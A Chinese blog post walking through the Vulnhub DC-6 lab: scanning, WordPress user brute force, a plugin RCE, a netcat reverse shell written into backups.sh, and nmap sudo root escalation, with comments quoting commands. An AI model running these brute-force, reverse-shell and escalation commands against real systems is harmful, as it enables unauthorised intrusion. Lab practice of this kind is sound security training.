当前位置:首页 > 网络安全 > 正文内容

Vulnhub_DC-6靶机通关笔记

访客3年前 (2021-04-13)网络安全827

Vulnhub提示:

扫描靶机IP地址:nmap -sP 192.168.10.0/24

扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129

开放端口22,80

访问80端口发现URL被重定向到wordy

我们需要在host文件中添加

文件位置 /etc/hosts

可以访问到啦

扫描下目录结构吧,

御剑扫描

发现是wordpress站点

使用WPscan扫描

一款专注于wordpress站点扫描工具

wpscan -url wordy

顺便枚举一下用户

站点没发现什么漏洞,暴力破解尝试下

root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

破解很久没获取密码,这时候想起Vulnhub重要提示

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用这个字典在尝试下暴力破解

root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt

获得密码

mark
helpdesk01

登录后台发现Activity on Wordy插件存在远程代码执行漏洞

利用远程代码执行命令漏洞步骤:

step1:打开burpsuite工具设置代理

step2:

step3:发送到重写模块

step4:kali打开端口监听

step5:利用成功获取到webshell

横向移动搜寻可以利用的信息

成功找到了graham的密码信息

查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本

如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell

echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh

kali 端监听 8888 端口

sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的

jens用户可以以 root权限执行 nmap nmap 提权分为两种

旧版本上以进入交互提权

# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/106483.html

分享给朋友:

“Vulnhub_DC-6靶机通关笔记” 的相关文章

立秋是几月几日

说到立秋,大家可能还会觉得比较远,确实算一下也还有将近一个月的时间,大家知道今年的立秋是在什么时候吗,具体的时间是2020年8月7日09:06:03,星期五,农历六月十八,因此在这一天大家就可以吃很多的美食,那么接下来大家就随百思特小编一起了解看看~   立秋是几月...

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

干洗对衣物有害吗

干洗对衣物有害吗 干洗剂实际上就是有机溶剂,所以对衣服多少都有点危害,只不过高级的干洗剂对衣服损伤小一些而已。 随着人们工作的繁忙和生活节奏的加快,现代人更多地把换下的衣物送到洗衣店干洗,以保证衣服不变形和有更多的时间休闲娱乐,这本是一件提高生活品质的好事,但据最新的研究显示,干洗衣物对身...

Webshell安全检测篇(1)-根据流量的检测方法

一、概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分类笔者总结如下: 前段时...

ems邮政快递查询(ems快递附近网点查询)

一、邮政快递包裹号码查询 北京邮政速递丰丸西路分局鑫源投资部:发货及收货 EMS快递单号:EI061382538CS 时间、地点及跟踪进展北京邮政速递丰丸路分公司西局鑫源投资部:发货及收货2012-02-12 08:19:21北京邮政速递丰丸路分公司西局鑫源投资部:安排发货2012-02-12...

老庙投资金条今日价格(老庙黄金多少一克)

鄙视知道管理员如需图片和核实,需谨慎黄金交易价格维持在236元左右,黄金首饰285元左右,回收2,老庙黄金08月,20克及以上290元/克,你好! 鄙视广告,投资黄金250元,铂金313元/克,请以官方价格为准。2日上海老庙黄金今日金价302元/克,建议索要发票看发票品名最近。 庙黄金今日价格,黄金...

评论列表

鸠骨哀由
2年前 (2022-05-30)

ups.sh脚本如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shellecho “ nc -e /bin/bash 192.168.10.155 8888 " > backups.shkali 端监听 8888 端口sudo -u jens 以jens用户执行脚本

痴者只影
2年前 (2022-05-30)

--url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt破解很久没获取密码,这时候想起Vulnhub重要提示root@kali:~# cat /usr/share/wordlists/rockyou.t

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。